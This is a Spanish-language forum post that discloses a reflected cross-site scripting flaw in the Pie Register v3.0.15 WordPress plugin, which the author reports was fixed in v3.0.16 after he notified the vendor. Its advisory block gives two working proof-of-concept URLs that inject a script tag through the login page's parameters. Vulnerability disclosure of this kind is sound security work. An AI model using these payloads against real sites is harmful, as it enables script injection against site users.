Mostrando resultados del 1 al 1 de 1

Tema: [Bug] Pie Register v3.0.15 (WP Plugin) - XSS Vulnerability [by Socket_0x03]

  1. #1
    Habitual Avatar de Socket_0x03
    Fecha de Ingreso
    mayo-2007
    Ubicación
    Ciberespacio
    Mensajes
    230
    Gracias obtenidos: 73

    Post [Bug] Pie Register v3.0.15 (WP Plugin) - XSS Vulnerability [by Socket_0x03]

    Pie Register es un plugin para WordPress en donde un webmaster puede crear formularios sin conocimientos de programación. Mediante Pie Register, un administrador puede añadir funciones de pago; por ejemplo, un administrador puede añadir una función de pago en donde a los usuarios se les cobre una cantidad via PayPal por registrarse al blog y tener acceso a ciertos archivos.

    Datos del Plugin:
    Descargas: 281,735.
    Descargas en los últimos 7 días (10/24/2018): 1,179.
    Instalaciones Activas: Más de 8,000.

    Le envié un email a Genetech solutions sobre la vulnerabilidad que tienen en su producto (Pie Register v3.0.15). En poco tiempo, corrigieron el fallo y ya cuentan con Pie Register v3.0.16.

    Código:
             =====================================================================================
             Pie Register v3.0.15 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Login
             =====================================================================================
    
    ____________________________________________________________________________________
    
    
     # Exploit Title: Pie Register v3.0.15 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Login
    
     # Date: [10-03-2018]
    
     # Category: Webapps
    ____________________________________________________________________________________
    
    
     # Author: Socket_0x03 (Alvaro J. Gene)
    
     # Email: Socket_0x03 (at) teraexe (dot) com
    
     # Website: www.teraexe.com
    
    ____________________________________________________________________________________
    
    
     # Software Link: https://wordpress.org/plugins/pie-register
    
     # Plugin: Pie Register
    
     # Version: v3.0.15 (last version)
    
     # File: login
    
     # Parameters: interim-login, wp-lang, and supplied URL.
    
     # Language: This application is available in English language.
    
     # Plugin Description: Pie Register is a WordPress plugin that an administrator can 
       use to create different kinds of forms without programming knowledge. In addition, 
       an administrator can use Pie Register for payment features; for example, if an 
       administrator is using Pie Register to provide some kind of service, he/she can
       charge an amount to his/her users via PayPal.
       
    ____________________________________________________________________________________
    
    
     #  Cross-Site Scripting Vulnerability:
     
        Name of an arbitrarily supplied URL parameter:
        http://www.website.com/wordpress/index.php/login/?frfqq"><script>alert(23)</script>rwhn7=1
    
        Parameters interim-login and wp-lang:
        http://www.website.com/wordpress/index.php/login/?redirect_to=http%3A%2F%2Fwww.website.com%2Fwordpress%2Findex.php%2F2018%2F09%2F27%2Fhello-world%2F&interim-login=zuhke"><script>alert(23)</script>v1ig9&wp_lang=en_US
    
    ____________________________________________________________________________________
    
     #  More:
    
        https://0day.today/exploit/31255
    Última edición por Socket_0x03; 25-oct-2018 a las 20:16
    [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]

  2. El Siguiente Usuario Agradeció a Socket_0x03 Por Este Mensaje:

    zolo (26-nov-2018)

Temas Similares

  1. [Bug] Tekno.Portal v0.1b - XSS Vulnerability [by Socket_0x03]
    By Socket_0x03 in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 26-sep-2018, 19:11
  2. Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability
    By Doddy in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 14-mar-2009, 01:58
  3. Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability
    By Doddy in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 14-feb-2009, 01:53
  4. Respuestas: 0
    Último mensaje: 31-oct-2008, 09:30
  5. Respuestas: 0
    Último mensaje: 13-sep-2008, 11:21

Normas de Publicación

  • No puedes crear nuevos temas
  • No puedes responder mensajes
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •